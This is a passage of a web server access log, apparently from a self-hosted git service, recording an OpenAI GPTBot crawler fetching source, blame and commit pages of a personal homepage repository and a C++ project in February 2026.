Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/ChatBot.tsx" -[17/Feb/2026:13:19:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/About.tsx" [Client 74.7.227.38] [Length 13781] [Gzip 5.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/About.tsx" -[17/Feb/2026:13:19:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/About.tsx" -[17/Feb/2026:13:19:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Header.tsx" [Client 74.7.227.38] [Length 14805] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components" -[17/Feb/2026:13:19:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/About.tsx" [Client 74.7.227.38] [Length 13920] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components" -[17/Feb/2026:13:19:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14189] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components" -[17/Feb/2026:13:19:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Header.tsx" -[17/Feb/2026:13:19:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Footer.tsx" -[17/Feb/2026:13:19:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15541] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components" -[17/Feb/2026:13:19:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Contact.tsx" -[17/Feb/2026:13:19:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14188] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components" -[17/Feb/2026:13:19:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project" [Client 74.7.227.38] [Length 10359] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project" -[17/Feb/2026:13:19:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/-/projects" [Client 74.7.227.38] [Length 6768] [Gzip 2.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer" -[17/Feb/2026:13:19:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/Dockerfile" [Client 74.7.227.38] [Length 11571] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a" -[17/Feb/2026:13:19:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Header.tsx" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Header.tsx" -[17/Feb/2026:13:19:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Header.tsx" [Client 74.7.227.38] [Length 14957] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Header.tsx" -[17/Feb/2026:13:19:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Footer.tsx" -[17/Feb/2026:13:19:35 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Header.tsx" -[17/Feb/2026:13:19:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14294] [Gzip 7.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Footer.tsx" -[17/Feb/2026:13:19:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/ChatBot.tsx" -[17/Feb/2026:13:19:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15900] [Gzip 7.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/ChatBot.tsx" -[17/Feb/2026:13:19:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Footer.tsx" -[17/Feb/2026:13:19:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14293] [Gzip 7.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Footer.tsx" -[17/Feb/2026:13:19:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Header.tsx" -[17/Feb/2026:13:19:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/Dockerfile" [Client 74.7.227.38] [Length 9909] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/Dockerfile" -[17/Feb/2026:13:19:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/Dockerfile" [Client 74.7.227.38] [Length 264] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/Dockerfile" -[17/Feb/2026:13:19:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/Dockerfile" [Client 74.7.227.38] [Length 10759] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/Dockerfile" -[17/Feb/2026:13:19:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/About.tsx" -[17/Feb/2026:13:19:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/About.tsx" [Client 74.7.227.38] [Length 13780] [Gzip 5.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/About.tsx" -[17/Feb/2026:13:19:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Footer.tsx" -[17/Feb/2026:13:19:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/ChatBot.tsx" -[17/Feb/2026:13:19:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Footer.tsx" -[17/Feb/2026:13:19:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/releases" [Client 74.7.227.38] [Length 7421] [Gzip 2.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/forks" -[17/Feb/2026:13:19:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 659894] [Gzip 25.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp.md" -[17/Feb/2026:13:19:50 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Header.tsx" -[17/Feb/2026:13:19:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 659894] [Gzip 25.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-cpp.md" -[17/Feb/2026:13:19:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer.atom" [Client 74.7.227.38] [Length 7818] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/forks" -[17/Feb/2026:13:19:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components" [Client 74.7.227.38] [Length 9852] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components" -[17/Feb/2026:13:19:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/services" [Client 74.7.227.38] [Length 9858] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/services" -[17/Feb/2026:13:19:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/About.tsx" [Client 74.7.227.38] [Length 9846] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/About.tsx" -[17/Feb/2026:13:19:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/About.tsx" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/About.tsx" -[17/Feb/2026:13:19:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429.diff" [Client 74.7.227.38] [Length 889] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429" -[17/Feb/2026:13:19:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/database.sqlite" [Client 74.7.227.38] [Length 10125] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/database.sqlite" -[17/Feb/2026:13:20:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/database.sqlite" [Client 74.7.227.38] [Length 9896] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/database.sqlite" -[17/Feb/2026:13:20:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15545] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components" -[17/Feb/2026:13:20:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 230661] [Gzip 25.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp.md" -[17/Feb/2026:13:20:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16469] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components" -[17/Feb/2026:13:20:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15544] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components" -[17/Feb/2026:13:20:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16467] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components" -[17/Feb/2026:13:20:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14193] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components" -[17/Feb/2026:13:20:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14191] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components" -[17/Feb/2026:13:20:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Header.tsx" [Client 74.7.227.38] [Length 14810] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components" -[17/Feb/2026:13:20:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/About.tsx" [Client 74.7.227.38] [Length 13923] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components" -[17/Feb/2026:13:20:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/About.tsx" [Client 74.7.227.38] [Length 13922] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components" -[17/Feb/2026:13:20:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Header.tsx" [Client 74.7.227.38] [Length 14808] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components" -[17/Feb/2026:13:20:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/ChatBot.tsx" -[17/Feb/2026:13:20:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15901] [Gzip 7.73] [Sent-to 192.168.0.250] "Mozilla/5.0 